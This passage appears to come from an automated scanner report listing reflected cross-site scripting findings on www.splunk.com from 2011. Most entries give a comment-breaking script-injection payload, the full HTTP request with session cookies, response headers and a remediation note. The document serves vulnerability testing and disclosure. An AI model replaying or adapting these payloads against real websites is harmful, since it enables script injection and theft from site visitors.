__utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:05 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 21487d829f9688f63940c67c7815f4ff1296944226 Last-Modified: Sat, 05 Feb 2011 22:17:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24018
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 53711--><script>alert(1)</script>ecf5dc23f48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view53711--><script>alert(1)</script>ecf5dc23f48/cloud-and-managed-service-providers/SP-CAAACP7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 59262--><script>alert(1)</script>4bccf0ded2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/cloud-and-managed-service-providers59262--><script>alert(1)</script>4bccf0ded2f/SP-CAAACP7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 1ba29--><script>alert(1)</script>10e9b5f0ca4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/cloud-and-managed-service-providers/SP-CAAACP71ba29--><script>alert(1)</script>10e9b5f0ca4 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:40 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:40 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:40 GMT; path=/ ETag: ce3911b49673b010cfde7c3586f9d5461296944260 Last-Modified: Sat, 05 Feb 2011 22:17:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18475
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5271c--><script>alert(1)</script>2fee61c7c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/cloud-and-managed-service-providers/SP-CAAACP7?5271c--><script>alert(1)</script>2fee61c7c19=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:55 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 2ce4dc14d8530e6b8e2f7a6223742f331296944155 Last-Modified: Sat, 05 Feb 2011 22:15:55 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9b36f--><script>alert(1)</script>acfc5f06107 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view9b36f--><script>alert(1)</script>acfc5f06107/contact-us/SP-CAAAAH7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:25 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:25 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:25 GMT; path=/ ETag: c76acf6e98a1591eab32b904e496f6ce1296944126 Last-Modified: Sat, 05 Feb 2011 22:15:26 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload dd051--><script>alert(1)</script>8100fcbb878 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/contact-usdd051--><script>alert(1)</script>8100fcbb878/SP-CAAAAH7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:57 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:57 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:57 GMT; path=/ ETag: d1fc130c27cd507f005a3b287ca6ff3a1296944157 Last-Modified: Sat, 05 Feb 2011 22:15:57 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload b7887--><script>alert(1)</script>0917a596735 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/contact-us/SP-CAAAAH7b7887--><script>alert(1)</script>0917a596735 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.542. http://www.splunk.com/view/contact-us/SP-CAAAAH7 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/contact-us/SP-CAAAAH7
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 56278--><script>alert(1)</script>4d98f9bfc83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/contact-us/SP-CAAAAH7?56278--><script>alert(1)</script>4d98f9bfc83=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:38 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 0ac66c375a4f849598c19dc25f4acd241296944080 Last-Modified: Sat, 05 Feb 2011 22:14:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the r request parameter is copied into an HTML comment. The payload d8695--><script>alert(1)</script>7007743a73 was submitted in the r parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/contact-us/SP-CAAAAH7?r=headerd8695--><script>alert(1)</script>7007743a73 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:36 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 93c1171c056a38de867c346a0f51a4301296944077 Last-Modified: Sat, 05 Feb 2011 22:14:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28413
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9e3ec--><script>alert(1)</script>b7fae0382cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view9e3ec--><script>alert(1)</script>b7fae0382cf/customer-case-studies/SP-CAAABB2 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 1d313--><script>alert(1)</script>44c48757134 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/customer-case-studies1d313--><script>alert(1)</script>44c48757134/SP-CAAABB2 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:05 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:05 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:05 GMT; path=/ ETag: 5aecfdbf3d27d5a88ca8e4a82f0a45401296944225 Last-Modified: Sat, 05 Feb 2011 22:17:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18419
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 9ffc9--><script>alert(1)</script>7a46f80782 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
